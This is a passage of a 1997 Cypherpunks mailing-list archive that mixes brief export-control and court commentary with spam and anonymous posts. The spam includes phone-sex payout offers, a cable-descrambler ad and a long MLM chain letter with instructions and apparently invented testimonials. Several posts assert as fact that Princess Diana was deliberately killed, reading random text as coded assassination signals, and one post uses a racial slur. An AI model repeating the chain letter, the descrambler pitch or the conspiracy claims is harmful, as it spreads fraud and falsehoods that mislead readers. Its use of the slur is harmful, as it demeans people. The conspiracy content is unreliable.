There's something wrong when I'm a felon under an increasing number of laws.
Only one response to the key grabbers is warranted: "Death to Tyrants!"
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay at got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Higher Power: 2^1398269     | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."









From ant at notatla.demon.co.uk  Sat Aug 30 17:29:57 1997
From: ant at notatla.demon.co.uk (Antonomasia)
Date: Sun, 31 Aug 1997 08:29:57 +0800
Subject: Developments in the _Junger_ suit
Message-ID: <199708302354.AAA01915@notatla.demon.co.uk>





>> BXA are quoted as writing:
>> : While the use of html links by a person might, in some applications,
>> : involve an export . . .

>I must admit to being very curious as to how html links can be an
>export.

>Is this an export?

>	RSA .sig


>This one might be fun also, but still I can't see that it's an export:

I think a mere pointer is not an export, no matter what it points to,
but a link with prohibited smuggled _content_ might be:




Pin Point Media, owners of Adult Patrol Age Verification System & Adult 
Web-Promotions are pleased to offer Free Pay Per Call Number with Pay outs
as high as .90 /minute U.S.

Here are our Current Services:

----------------------------------------------------
**** PHONE SEX NUMBERS ****
----------------------------------------------------

Number Type         Your Payout    Cost To Callers    Area Available
---------------------------------------------------------------------------------------------------------
1-800 Live Gay       .90 /Minute    2.49 - 3.99 /Minute   U.S.A. Only
1-800 Live Female  .90 /Minute    2.49 - 3.99 /Minute   U.S.A. Only
****  Some 1-800 specialty numbers are also available **** 

011-232 Live       .20 /minute    Long Distance Only     Globally

All Pay outs are in U.S. Funds.

We are also please to announce that we now offer online Statistics 
Tracking for your number to assure that you are always abreast on 
how your numbers are doing.

Signup Online at: http://www.adultpatrol.com/phonesex/
Or Email:   Claudine at adultpatrol.com




------------------------------------------------------------------------------------------------
**** ADULT WEBMASTER BULK EMAIL PROMOTIONS ****
------------------------------------------------------------------------------------------------
Do you have a Product or Service that caters to Webmasters of Adult 
Orientated Sites ?

We have your promotions and visibility answers !

Our current Bulk mailing service offers a mailing to 18,000+ Adult 
Webmasters for only 450.00 U.S. per mailing.

We also offer huge discounts for Maintenance Accounts, where as we 
will complete all of your bulk mailing needs for one low monthly fee.  
Prices depend upon size and frequency of promotions. 

For more information on our services, email; 

  admin at web-promotions.com

or visit our information site at:  

http://www.web-promotions.com/services/




-----------------------------------------------------------------------------------------
**** ADULT PATROL AGE VERIFICATION SYSTEM ****
-----------------------------------------------------------------------------------------
Who else pays you 7.00 Per sign up in your first 30 days and 6.00 per 
sign up there after with downline referral programs and only charges 
your clients 9.95 /year.

Don't you think your clients deserve the best possible pricing ?

Here is our complete Payout vs. Sign Up Fee Information:

Duration of Sign up | Your Payout | Cost to your Clients           
-------------------------------------------------------------------------------------
*First 30 days*

1 Year Signup          $   7.00          $  9.95
2 Year Signup          $ 11.00          $ 15.95
Lifetime Signup        $ 28.00          $ 39.95

*After 30 days*

1 Year Signup          $  6.00          $   9.95
2 Year Signup          $  9.00          $ 15.95
Lifetime Signup        $ 24.00         $ 39.95

   
Compare for yourself ! Some other Verification Systems are surviving 
off a name alone. 

All that should really matter is how much your monthly check is and we 
think we'll 
be sending you more !

Give us a try for 30 days and judge for yourself.

Signup form is located at: 
http://www.adultpatrol.com/queries/wmsignup1.idc?vendorid=16


~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
To be removed from future mailings just click on REPLY and SEND
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~





From anon at anon.efga.org  Sat Aug 30 22:23:44 1997
From: anon at anon.efga.org (Anonymous)
Date: Sun, 31 Aug 1997 13:23:44 +0800
Subject: None
Message-ID: 



http://www.csmonitor.com/todays_paper/graphical/today/us/us.5.html

Plan for a New Appeals Court Catches Opponents Off Guard 

     Robert Marquand, Staff writer of The Christian Science Monitor 

     BOSTON -- For Alaska's two senators, the final straw came in December. Like many Republicans from the brawny Northwest, they had long been irked
     that their state was part of the huge Ninth Circuit Court of Appeals, which has 28 judges and extends from San Diego to Anchorage. It wasn't just that the
     circuit court's size made it inefficient, they said. It was those liberal judges in San Francisco and what Sen. Ted Stevens (R) of Alaska called the "domination
     of the court by California lawyers."
....

"We cannot subject something as important as the structure of our courts to political gamesmanship," Hyde says. His bipartisan commission, agreed to after a
     hard battle in the spring, would make the first major review of all federal circuits in many years. "The process must be fair." 

     The Ninth Circuit has long typified liberal activism, yet that image may be somewhat distorted. A new study by Dr. Hellman shows that in the past year, the
     majority of the judges in cases reversed by the Supreme Court were not from California, but from states considered to be more conservative.

Hmm... Judge Patel wouldn't of issued a stay of Bernstein to have placated a Senator or two would she?







From nobody at REPLAY.COM  Sat Aug 30 23:04:49 1997
From: nobody at REPLAY.COM (Anonymous)
Date: Sun, 31 Aug 1997 14:04:49 +0800
Subject: No Subject
Message-ID: <199708310556.HAA25027@basement.replay.com>




Received this yesterday.  Out of curiousity, anyone
know where (810) area code is located?


------Begin Forwarded Message-----------

Imagine yourself watching EVERY PREMIUM
and basic CHANNEL on your own equipment
just two short days from now!

Whether your system is Jerrold (TM), General Instrument (TM),
Scientific Atlanta (TM), Tocom (TM), Pioneer (TM), Zenith (TM),
Hamlin (TM), or Oak (TM) we have the equipment for you.

We are Tuxton Wholesale Electronics - America's
best source for cable TV converters / descramblers
and we stand behind what we sell:

30 day money back guarantee
6 month warranty
Technical support hotline

All units are:

Completely automatic - just hook up and enjoy
Completely undetectable - no one outside your home knows it's there
Completely bullet proof - only you can shut it down
Constructed of the latest micro circuitry - for years of dependability

Prices start at just $189

*****SPECIAL INTERNET OFFER*****

Call us today at 810-468-2891 M-F 10:00 am to 5:00 pm EST
with the make and model number of your cable company's
converter / descrambler and second day Federal Express
SHIPPING IS FREE!!!!!

That's right -  in two days you'll have ALL THE CHANNELS
and we'll pay the shipping charges!

**ONLY THOSE NOTIFIED BY E-MAIL ARE ELIGIBLE ****

Hurry, our SPECIAL Internet Promotion ends September 12th, 1997.
When calling please provide us with your e-mail address
to receive free shipping.

Need extra income - everyone wants these boxes -
ask about our dealer program (volume discounts).


This is the only message that you will receive.
Your name will be automatically removed from our database.

Thank You.


All brand names are registered trademarks of their respective owners and
are used for reference only.  Tuxton Wholesale Electronics claims no
affiliation with any of these companies and uses the names for
identification and illustration purposes only.

Imagine yourself watching EVERY PREMIUM
and basic CHANNEL on your own equipment
just two short days from now!

---------End Forwarded Message--------------





        






From remailer at bureau42.ml.org  Sat Aug 30 23:18:54 1997
From: remailer at bureau42.ml.org (bureau42 Anonymous Remailer)
Date: Sun, 31 Aug 1997 14:18:54 +0800
Subject: Confirmation on Diana, please?
Message-ID: 




Are there any Cypherpunks mailing list members who can confirm that
there was a series of posts related to Princess Diana's death in the
days before the event? I am particularly interested in information as
to whether Cypherpunks were in any way responsible for a slight delay
in the timing of her death.
I am particularly interested in communicating with the person who sent
me the anonymous messages between 8/24/97 and 8/30/97 using the nym
"A'Tak A'Tdorn'.

If you have information and an interest in sharing it, please send a
post to the Cypherpunks list or the fight-censorship list, indicating
such. If you wish for me to contact you through a neutral, third party,
indicate that as well.

Thank You






From anon at anon.efga.org  Sat Aug 30 23:32:06 1997
From: anon at anon.efga.org (Anonymous)
Date: Sun, 31 Aug 1997 14:32:06 +0800
Subject: Princes Die! / Re: None
Message-ID: 



 The metallic custard scent ripped through the
 stegosaurus' nostrils.  Clearly, the monotreme
 journey it would begin as it had ended.
 
 The ponder-tree hung itself in the heavy air,
 it's sap becomming purple, and flowed engimatically
 like a river of broken curves and powdered eggshells.
 
 - A'Tak A'Tdurn






From dawn at iTribe.net  Sun Aug 31 16:48:55 1997
From: dawn at iTribe.net (dawn at iTribe.net)
Date: Sun, 31 Aug 1997 16:48:55 -0700 (PDT)
Subject: In the comfort of home
Message-ID: <199702170025.JTT0987@compuserve.net>


Subj:	MAKE MONEY with your COMPUTER too...it's EASY!
Date:	97-08-22 12:53:52 EDT
From:	18112320 at gte.net
Reply-to:	the.money.tree at make.money.on.line.21.com
To:	all.investors.21 at investing.on.the.net.com



PLEASE TAKE THE TIME TO READ THIS.
THIS PROGRAM REALLY DOES WORK!

***********We Will SEND 5000 E-Mails FREE************

Dear friend,

Do you realize hundreds of thousands of dollars are made each day by
way of the internet.  Haven't you ever thought "I wish I could find a
way to make money with my computer and my internet connection"?  
Well you can!  The internet is making it possible for everyday, ordinary people like you and me to make lots of money.  Many of you will read this and think "That can't work" or "It sounds too good to be true".  But I challenge you to discard traditional thinking and allow yourself the opportunity to make some of those thousands of dollars that are exchanging hands each and every hour.

The opportunity below is no scam and is very legal.  It is a simplified
form of email marketing using MLM techniques.  The first time I saw it I deleted it immediately. But the next time I saw it I figured I had nothing to lose with so very little investment required.  This is my 2nd time doing this program. The first time I did this I made very good money.  I decided to do it again but make it even better by sending out more mail.  Please at least read this as it may be the answer you've been looking for.  You certainly have nothing to lose.

"THINK ABOUT IT"

Before you delete this program from your mailbox, as I almost did, take
a little time to read it and REALLY THINK ABOUT IT.  Get a pencil and
figure out what could happen when YOU participate.  Figure out the
worst possible response and no matter how you calculate it, you will
still make a lot of money!  Definitely get back what you invested.  Any
doubts you have will vanish when your first orders come in.  IT WORKS!

                                        Paul Johnson, Raleigh, NC


 Everything below this line is what was sent to me.

*** Print This Now For Future Reference ***

$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$

This is a MONEY-MAKING PHENOMENON. PRINT this letter, read the program... THEN READ IT AGAIN !!!

You are looking at the most profitable and unique program you may ever see. It has demonstrated and proven ability to generate large sums of money. This program is showing fantastic appeal with a huge and ever growing population which needs additional income.

This is a legitimate LEGAL money-making opportunity. It does not require you to come in contact with people, do any hard work, and best of all, you never have to leave the house, except to get the mail. If you believe that some day you will get that lucky break that you have been waiting for, THIS IS IT! Simply follow the easy instructions, and your dream will come true! This electronic multi-level marketing program works perfectly...100% EVERY TIME!

Thousands of people have used this program to raise capital to start their own business, pay off debts, buy homes, cars, etc., even retire! This is your chance, so don't pass it up.

OVERVIEW OF THIS EXTRAORDINARY ELECTRONIC MULTI-LEVEL MARKETING PROGRAM

Basically, this is what we do:

We sell thousands of people a product for $5.00 that costs us next to nothing to produce and e-mail. As with all multi-level businesses, we build our business by recruiting new partners and selling our products. Every state in the U.S. allows you to recruit new multi- level business online (with your computer).

The product in this program is a series of four business and financial reports. Each $5.00 order you receive by "snail mail" will include the e-mail address of the sender. To fill each order, you simply e-mail the product to the buyer. THAT'S IT!...the $5.00 is yours! This is the GREATEST electronic multi-level marketing business anywhere!

FOLLOW THE INSTRUCTIONS EXACTLY! Let's face it, the profits are worth it! THEY'RE TREMENDOUS!!! So go for it. Remember the 4 points and we'll see YOU at the top!

******* I N S T R U C T I O N S *******

This is what you MUST do: 1. Order all 4 reports listed and numbered from the list below. For each report send $5.00 CASH, YOUR E-MAIL ADDRESS and YOUR RETURN POSTAL ADDRESS (in case of a problem) to each person listed. When you order, make sure you request each SPECIFIC report. You will need all four reports, because you will be saving them on your computer and reselling them. 2. IMPORTANT--DO NOT alter the names, or their sequence other than instructed in this program! Or you will not profit the way you should. Replace the name and address under REPORT #1 with yours, moving the one that was there down to REPORT #2. Move the name and address under REPORT #2 to REPORT #3. Move the name and address under REPORT #3 to REPORT #4. The name and address that was under REPORT #4 is dropped off the list and is NO DOUBT on the way to the bank. When doing this, please make certain you copy everyone's name and address ACCURATELY!!! Also, DO NOT move the Report/Product positions! 3. Take this entire program text, including the corrected names list, and save it on your computer. 4. Now you're ready to start a massive advertising campaign on the WORLDWIDE WEB! Advertising on the WEB is very, very inexpensive, but there are HUNDREDS of FREE places to advertise also. Another avenue which you could use is e-mail mailing lists. You can buy these lists for under $20/1,000 addresses. START YOUR AD CAMPAIGN AS SOON AS YOU CAN.

ALWAYS PROVIDE SAME-DAY SERVICE ON ALL ORDERS!!!

REQUIRED REPORTS

***Order each REPORT by NUMBER and NAME***

ALWAYS SEND $5 CASH (Concealed) FOR EACH ORDER REQUESTING THE SPECIFIC REPORT BY NAME AND NUMBER. ALWAYS SEND FIRST CLASS OR PRIORITY MAIL AND PROVIDE YOUR E-MAIL ADDRESS FOR QUICK DELIVERY. ______________________________________________________________ REPORT #1 "HOW TO MAKE $250,000 THROUGH MULTI-LEVEL SALES" ORDER REPORT #1 FROM: D.R. Marketing 2318 Halyard Lane Cheasapeake Va 23323 ___________________________________________________________________ REPORT #2 "MAJOR CORPORATIONS AND MULTI-LEVEL SALES" ORDER REPORT #2 FROM: Ann Rossi P.O. Box 5894 Glen Allen Va. 23058 ___________________________________________________________________ REPORT #3 "SOURCES FOR THE BEST MAILING LISTS" ORDER REPORT #3 FROM: "Bonni Cakes" (Randy) P O BOX 7247 Endicott, NY 13760-7247 ___________________________________________________________________ REPORT #4 "EVALUATING MULTI-LEVEL SALES PLANS" ORDER REPORT #4 FROM: Information Services 11006 4th St. North Box 160 St. Petersburg, FL 33716 ______________________________________________________________________

HERE'S HOW THIS AMAZING PLAN WILL MAKE YOU $MONEY$

Let's say you decide to start small just to see how it goes. Assume your goal is to get 10 people to participate on your first level. (Placing a lot of FREE ads on the internet could EASILY get a better response.) Also assume that everyone else in YOUR BUILDING ORGANIZATION gets ONLY 10 downline members. Follow this example for the STAGGERING results below.

1st level--your 10 members with $5 $50 2nd level--10 members from those 10 ($5 x 100) $500 3rd level--10 members from those 100 ($5 x 1,000) $5,000 4th level--10 members from those 1,000 ($5 x 10,000) $50,000 THIS TOTALS-----------> $55,550

Remember friends, this is assuming that the people who participate only recruit 10 people each. Dare to think for a moment what would happen if everyone got 20 people to participate! Some people get 100's of recruits! THINK ABOUT IT! By the way, your cost to participate in this is practically nothing.You obviously already have an internet connection and email is FREE!!! REPORT#3 will show you the best methods for bulk emailing and purchasing email lists.

REMEMBER: Approx. 50,000 new people get online monthly!

ORDER YOUR REPORTS NOW!!!

*******TIPS FOR SUCCESS*******

TREAT THIS AS YOUR BUSINESS! Send for the four reports IMMEDIATELY, so you will have them when the orders start coming in because: When you receive a $5 order, you MUST send out the requested product/report to comply with the U.S. Postal & Lottery Laws, Title 18,Sections 1302 and 1341 or Title 18, Section 3005 in the U.S. Code,also Code of Federal Regs. vol. 16, Sections 255 and 436, which state that "a product or service must be exchanged for money received."

* ALWAYS PROVIDE SAME-DAY SERVICE ON THE ORDERS YOU RECEIVE.

* Be patient and persistent with this program. If you follow the instructions exactly the results WILL undoubtedly be SUCCESS!

* ABOVE ALL, HAVE FAITH IN YOURSELF THAT YOU CAN SUCCEED!

*******YOUR SUCCESS GUIDELINE*******

The check point that guarantees your success is simply this: You MUST receive 10 to 20 orders for REPORT #1! THIS IS A MUST! If you don't within two weeks, advertise more and send out more programs until you do. Then, a couple of weeks later you should receive at least 100 orders for REPORT #2. If you don't, advertise more and send out more programs until you do. Once you have received 100, or more orders for REPORT #2, YOU CAN RELAX, because you will be on your way to the BANK! -OR- You can DOUBLE your efforts!

REMEMBER: Every time your name is moved down on the list you are in front of a DIFFERENT report, so you can KEEP TRACK of your PROGRESS by watching what report people are ordering from you.

IT'S THAT EASY!!!

NOTE: IF YOU NEED HELP with starting a business, registering a business name, how income tax is handled, etc., contact your local office of the Small Business Administration (a Federal agency) for free help and answers to questions. Also, the Internal Revenue Service offers free help via telephone and free seminars about business taxes.

******* T E S T I M O N I A L S *******

This program does work, but you must follow it EXACTLY! Especially the rule of not trying to place your name in a different position, it won't work, you'll lose a lot of money. I'm living proof that it works. It really is a great opportunity to make relatively easy money, with little cost to you. If you do choose to participate, follow the program exactly, and you'll be on your way to financial security. If you are a fellow Christian and are in financial trouble like I was, consider this a sign. I DID!

Good Luck & God Bless You, Sincerely, Chris Johnson

P.S. Do you have any idea what 11,700 $5 bills ($58,500) looks like piled up on the kitchen table?...IT'S AWESOME!

My name is Frank. My wife Doris and I live in Bel-Air, MD. I am a cost accountant with a major U.S. Corporation and I make pretty good money. When I received the program I grumbled to Doris about receiving "junk mail"! I made fun of the whole thing, spouting my knowledge of the population and percentages involved. I "knew" it wouldn't work. Doris totally ignored my supposed intelligence and jumped in with both feet. I made merciless fun of her, and was ready to lay the old "I told you so" on her when the thing didn't work... well, the laugh was on me! Within two weeks she had received over 50 responses. Within 45 days she had received over $147,200 in $5 bills! I was stunned. I was sure that I had it all figured and that it wouldn't work...I AM a believer now. I have joined Doris in her "little" hobby. I did have seven more years until retirement, but I think of the "rat race" and it's not for me...We owe it all to MLM.

Frank T., Bel-Air, MD

This is the only realistic money-making offer I've ever received. I participated because this plan truly makes sense. I was surprised when the $5.00 bills started filling my mail box. By the time it tapered off I had received over 8,000 orders with over $40,000 in cash. Dozens of people have sent warm personal notes too, sharing the news of their good fortunes! It's been WONDERFUL.

Carl Winslow Tulsa, OK

The main reason for this letter is to convince you that this system is honest, lawful, extremely profitable, and is a way to get a large amount of money in a short time. I was approached several times before I checked this out. I joined just to see what one could expect in return for the minimal effort and money required. Initially I let no one in the organization know that I was an attorney and, to my astonishment, I received $36,470.00 in the first 14 weeks, with money still coming in.

Sincerely yours, Phillip A. Brown

This plan works like GANG-BUSTERS!!! So far I have had 9,735 total orders...OVER $48,000!!! I hope I have sparked your own excitement, if you follow the program exactly, you could have the same success I have, if not better. Your success is right around the corner, but you must do a little work.

Good Luck! G. Bank

Not being the gambling type, it took me several weeks to make up my mind to participate in this plan. But conservative that I am I decided that the initial investment was so little that there was just no way that I wouldn't get enough orders to at least get my money back. Boy I was surprised when I found my medium-size post office box crammed with orders. After that it got so over-loaded that I had to start picking up my mail at the window. I'll make more money this year than any 10 years of my life before. The nice thing about this deal is that it doesn't matter where in the U.S. the people live. There simply isn't a better investment with a faster return.

Mary Rockland, Lansing, MI

This is my third time to participate in this plan. We have quit our jobs, and quite soon we will buy a home on the beach and live off the interest on our money. The only way on earth that this plan will work for you is if you do it. For your sake, and for your family's sake don't pass up this golden opportunity. Remember, when you order your four reports, SEND CASH. Checks have to clear the bank and create too many delays. Good luck and happy spending!

Charles Fairchild, Spokane, WA

Typically when I look at a money-making deal I want to know if the company is strong, will it be here when it's time for my big pay off. In this crazy thing there is no company intervention for management to blow it. Just people like me ordering directly from the source! Interesting...I had a couple of projects I'd been trying to fund to no avail so I thought; Why not give it a try? Well 2 1/2 weeks later the orders started coming in. One project is funded and I'm sure the other will be soon!

Marilynn St. Claire, Logan, UT

We could be printing YOUR testimonial next!!! ORDER YOUR REPORTS TODAY AND GET STARTED DOWN THE ROAD TO YOUR FINANCIAL FREEDOM!!!

- Comments: Authenticated sender is

From Announce at gosnet.com Sun Aug 31 18:14:15 1997 From: Announce at gosnet.com (Announce at gosnet.com) Date: Sun, 31 Aug 1997 18:14:15 -0700 (PDT) Subject: Live Live Live Message-ID: <199706152326MAA19814@post.uu.net> New Adult Site Experience LIVE adult shows inside your Browser* without any additional plug ins! See shows broadcasted LIVE from the USA with some of the hottest girls on the Internet. Unlike any other site, you can WATCH the shows WITHOUT paying per minute charges. Plus, view one of the best maintained picture archives around. Must be 18 years of age or older. Don't just take our word for it ==>Take an absolutely FREE tour and experience the future of adult entertainment on the internet, today. goto http://www.gosnet.com/kittycat and click on Guest * Must be running Netscape 3.0 or higher to view the streaming feed. Members can watch live show with NO per minute charges. Must be 18 years of age or older to take the Free Tour. To be placed on the Universal E-mail Remove List e-mail a letter to kittycat at gosnet.com and Place the word Remove in the Subject Line this will place you in the UERL pool and will help stop unwanted e-mail from other commercial e-mailers. From anon at anon.efga.org Sun Aug 31 03:54:41 1997 From: anon at anon.efga.org (Anonymous) Date: Sun, 31 Aug 1997 18:54:41 +0800 Subject: Top 10 Ways to Make a Grouchy Old CypherPunk Smile - #6 Message-ID: Top 10 Ways to Make a Grouchy Old CypherPunk Smile -------------------------------------------------- #10) Find his shoes for him. #9) Buy Kent Crispin a Dr. Kevorkian gift-certificate. #8) Nuke Washington DC #7) Send ten copies of this back to Vulis. #6) Have ? the Playtpus send him an email saying "Nude D.C." #5) #4) #3) #2) #1) [This space reserved for T.C. May] From nobody at rigel.cyberpass.net Sun Aug 31 04:54:13 1997 From: nobody at rigel.cyberpass.net (WinSock Remailer) Date: Sun, 31 Aug 1997 19:54:13 +0800 Subject: Top 10 Ways to Make a Grouchy Old CypherPunk Smile - #5 Message-ID: <199708311141.EAA13095@sirius.infonex.com> Top 10 Ways to Make a Grouchy Old CypherPunk Smile -------------------------------------------------- #10) Find his shoes for him. #9) Buy Kent Crispin a Dr. Kevorkian gift-certificate. #8) Nuke Washington DC #7) Send ten copies of this back to Vulis. #6) Have ? the Playtpus send him an email saying "Nude D.C." #5) Explain to him that the way John Young writes (Youngbonics) is actually a sophisticated form of crypto. #4) #3) #2) #1) [This space reserved for T.C. May] From master25 at icon.co.za Sun Aug 31 20:03:54 1997 From: master25 at icon.co.za ($200,000/yr AVERAGE earnings) Date: Sun, 31 Aug 1997 20:03:54 -0700 (PDT) Subject: $10,000/mo possible first month - Be a 900 Number Broker Message-ID: <199708314365KAA5383@surundico.bcr.bc.ca> It's True.... The AVERAGE U.S. 900 Number Business Earns $200,000/year. You can have one FREE. FREE REPORT shows you how to get it and how to run it.. in your spare time.....from home..........Details http://www.mail-response.com/beacon/900tpc.html eIis From bubba at dev.null Sun Aug 31 05:16:41 1997 From: bubba at dev.null (Bubba Rom Dos) Date: Sun, 31 Aug 1997 20:16:41 +0800 Subject: Confirmation on Diana, please? In-Reply-To: Message-ID: <34095D37.2A7B@dev.null> bureau42 Anonymous Remailer wrote: > > Are there any Cypherpunks mailing list members who can confirm that > there was a series of posts related to Princess Diana's death in the > days before the event? I am particularly interested in information as > to whether Cypherpunks were in any way responsible for a slight delay > in the timing of her death. Actually, her death was meant as a message to the cypherpunk paparazzi. Unlike the good little soldiers who come at the beck and call of the rich and powerful, and who sit and stay like good little puppies when told to do so, the cypherpunk paparazzi resisted being herded about in the interests of others, accepting scraps from the table of benificent superiors. Once Diana started becoming a strong, self-directed person, she became a threat to those who pull the strings of everyone connected to the House of Windsor. Her recent moves into the political arena, under the influence of a rich sandnigger who was buying up all of the good votes in British Parliament, made her very, very expendable. > I am particularly interested in communicating with the person who sent > me the anonymous messages between 8/24/97 and 8/30/97 using the nym > "A'Tak A'Tdorn'. You mean the aneurism for "Attack at Dawn-D.Thorn?" > If you have information and an interest in sharing it, please send a > post to the Cypherpunks list or the fight-censorship list, indicating > such. If you wish for me to contact you through a neutral, third party, > indicate that as well. Just tell Louis Freeh you want my unlisted number. Why are you fishing for information that is freely available to anyone with access to a clue-server? A liability has now become an asset, at the same time drawing fire on Rupert Murdoch, sending a message to the off-white trash inundating England, and opening up an opportunity for those in power to stomp some human rights into the ground while claiming support for 'privacy.' Prince Charles is now free to marry, without having an unroyalized 'ex' to whom his new bride would pale by comparison. You can't have a loose cannon ex-Princess running about being mother to the heirs to the throne (which would make Prince Charle's next wife an usurping slut who hadn't bourne the Royal children). Now Prince Charles is free to find the 'right' woman--one who will understand that her role is to play the docile, anal-retentive spouse while Chucke gets his nut with his ex-stripper girlfriends. Now Prince Chuck is free to become King Chuck. I don't know who talked her into going along with the previous attempts on her life as "suicide attempts" in return for getting cut loose from the Royal family, but I hope they are ashamed of themself. Once Diana had allowed those 'rumors' to be dispelled, then she became a potential target, once again. And once she was out of the reach of the people who had been medicating her (in order to lend credence to the attempts to have her perceived as mentally unstable), she was a danger. Count the number of times you hear the press unwittingly mention that she died just when her life was coming together and her star was rising. When you are done counting, that is the number of reasons for why she had to die. Think about it. ~~ Bubba ~~ From nobody at REPLAY.COM Sun Aug 31 05:30:16 1997 From: nobody at REPLAY.COM (Anonymous) Date: Sun, 31 Aug 1997 20:30:16 +0800 Subject: None Message-ID: <199708311218.OAA29161@basement.replay.com> Anonymous wrote: > Robert Marquand, Staff writer of The Christian Science Monitor This wouldn't be a signal that the French event instigated by the Masons has been completed, could it? From nobody at REPLAY.COM Sun Aug 31 05:30:37 1997 From: nobody at REPLAY.COM (Anonymous) Date: Sun, 31 Aug 1997 20:30:37 +0800 Subject: Princes Die! / Re: None Message-ID: <199708311218.OAA29193@basement.replay.com> Anonymous wrote: > like a river of broken curves and powdered eggshells. > > - A'Tak A'Tdurn This couldn't mean that the attack at dawn is done, could it? From nobody at REPLAY.COM Sun Aug 31 05:47:03 1997 From: nobody at REPLAY.COM (Anonymous) Date: Sun, 31 Aug 1997 20:47:03 +0800 Subject: Confirmation on Diana, please? Message-ID: <199708311236.OAA00811@basement.replay.com> Bubba Rom Dos wrote: ... > Count the number of times you hear the press unwittingly mention that > she died just when her life was coming together and her star was rising. > When you are done counting, that is the number of reasons for why she > had to die. Think about it. > > ~~ > Bubba > ~~ Loose-cannon Diana became dead Saint Diana ala J.F.K. "What a wonderful person she is, now that she's gone." Why do the nefarious, omniprescent 'they' (TM) always announce the death by heart attack so many hours after rushing the target to the hospital? Does it have to do with airline schedules? Any reports of a second driver on the grassy knoll? Any guesses as to when the crash surviver bites it? !Bubba From nobody at REPLAY.COM Sun Aug 31 05:56:52 1997 From: nobody at REPLAY.COM (Anonymous) Date: Sun, 31 Aug 1997 20:56:52 +0800 Subject: Confirmation on Diana, please? Message-ID: <199708311244.OAA01428@basement.replay.com> Personally, I have to say that if *I* got a reply to an anonymous post before it had even reached its destination, I would start to worry... > bureau42 Anonymous Remailer wrote: > > > > Are there any Cypherpunks mailing list members who can confirm that > > there was a series of posts related to Princess Diana's death in the > > days before the event? I am particularly interested in information as > > to whether Cypherpunks were in any way responsible for a slight delay > > in the timing of her death. > > I am particularly interested in communicating with the person who sent > > me the anonymous messages between 8/24/97 and 8/30/97 using the nym > > "A'Tak A'Tdorn'. > > > > If you have information and an interest in sharing it, please send a > > post to the Cypherpunks list or the fight-censorship list, indicating > > such. If you wish for me to contact you through a neutral, third party, > > indicate that as well. > > > > Thank You > > If you have a death-wish, then send this message again through the > Canadian Mountie remailer. {:>)-----< > {HELP! They knocked me down and cut off my arms!} > > I presume the message you are referring to on 24/8/97 is the one > which answers your previous anonymous inquiry by saying, > "Only for the moment we are saying nothing." > It meant what it said. However, since the moment is over I suppose > there is no harm in saying "something." I will therefore give you > a modicum of information on the messages which have passed through > the cypherpunks list since your original notification that something > was in the wind. > For starters, although I have not seen the original email which you > received but I believe that if you read it closely you will see that > it implied that the coming messages to the list would be in a form > which was _analogous_ to the event, whereas you seemed to take it > literally as a plan to "Nuke D.C." > [How you managed to come to the conclusion that spooks and shadows > would refer to a coming event directly totally escapes me!?!] > If you will reinterpret the posts in question in light of the event, > I believe you will see the thread that winds through them. > > As you were told, the AOL'er messages were used as markers to divine > which of the coming messages contained stegonographic messages of one > sort or another, or pointers to graphics containing the stegonography. > I am assuming you understood this and sent the AOL'er message saying, > "Please send more details...thanks" > > If you had not taken the phrase "Nuke D.C." so literally you would > have noticed that the "Fade to Gray" post linked the coming major > event (Nuke D.C.) to foreigners, automobiles and death. > You were not alone in your request for details regarding the message > in the Quote of the day: > "I know the day it happens. On August 29, 1997 it's going > to feel pretty fucking real to you too." > which had been sent by one of the Canadians involved in ferreting out > the details of the coming event. > One of the cypherpunk list members posted the question, "When is X-Day > supposed to be?" when there was no mention of 'X-Day' in the quote. This > understandably led to postponement of the event while those involved > checked to see if there had been a breach in their security. > The subsequent message which stated, "I don't know what you mean by > 'When is X-Day supposed to be?'" was interpreted by those involved to > indicate that full details of their plans remained a mystery to those > who were trying to expose and stop it. > After they had put things in motion to proceed with their backup plan, > however, two more messages came to the list which indicated that there > was more known about their plan than they had suspected. > > In reply to the post expressing lack of knowledge about the timing of > X-Day, a post from _lne.com_ (surprise, surprise) suggested that X-Day > referred to people who are going to be "taken from the earth" (death) > by "pleasure saucers" (limosene) and noting that the limosene would > be operated by "Greys" (a reference to the ending of > the "Fade To Gray" post--indicating a spook/LEA connection). The post > ended by suggesting the time of the event might be "April" (4 o'clock) > and gave a pointer to a sight with a graphic stego which would provide > a visual message. > > The second post that came well after it had been decided to proceed > with the backup plan said, > "The metallic custard scent ripped through the > stegosaurus' nostrils." > (metallic custard being a car bomb--note eye witness > accounts by Michael Solomon {who just happened to be > on the scene, naturally} speaking of a "loud explosion" > that brought to mind "terrorists."} > > "Clearly the meonotreme (Monarchist/Anarchist/Extremist) > journey it would begin as it had ended." > (The Fairy Tale Princess who had embarked on an extremist > political journey was about to return to becoming the > {dead} Fairy Tale Princess, once again.) > > "The ponder-tree hung itself in the heavy air, > it's sap becomming purple." > (Diana had sealed her death {"hung itself"} when she > opted to bond herself to Royal blood.) > > "And flowed enigmatically > like a river of broken curves and powdered eggshells." > (A reference to the immediate area of the planned event, > which would be at the split {"broken"} of a tunnel road > {"river"} and the airbags being sabotaged.) > > After this post appeared on the cypherpunks list, a Timmy C. Mayflower > ASCII art spam showed up on the list from a juno remailer, but it had > a Timothy C. May .sig following the artwork. (Followed by the proverbial > GJBuller response.) > Then both the juno remailer and the toad list experienced problems with > multiple messages being sent to _some_ people and _not_ others, as well > as _some_ people not getting certain messages at all. > You will also note that, as the "Fade To Gray" post indicated (re: all > the cypherpunks being "out of town" at the time of the event), there was > no activity on the list in the time surrounding the event. > As for the information in the graphic pointed to by the lne.com post, > it was never considered to be anything but an attempt at intentional > misdirection. > > You were told months ago that Diana's current power came from the > failure of the so-called suicide attempt and that the agreement to > leave her free to continue her public activities was contingent upon > her remaing free from political matters. You were also informed that > her involvement with the Labor Party land-mine issue was a breach of > that agreement, as was her June 13th reference to the resistance of > the Conservative party in this regard. > When you were contacted last week, you should have been able to figure > out for yourself what her link to the Harrods clan indicated. You were > made aware of everything you needed to be sitting on top of the story. > Given the fact that you have shown so little ability to act on the > information you have already been given, we are probably wasting our > time by giving you any further information. Regardless, if you wish to > pursue the matter then I suggest that you research: > a) the 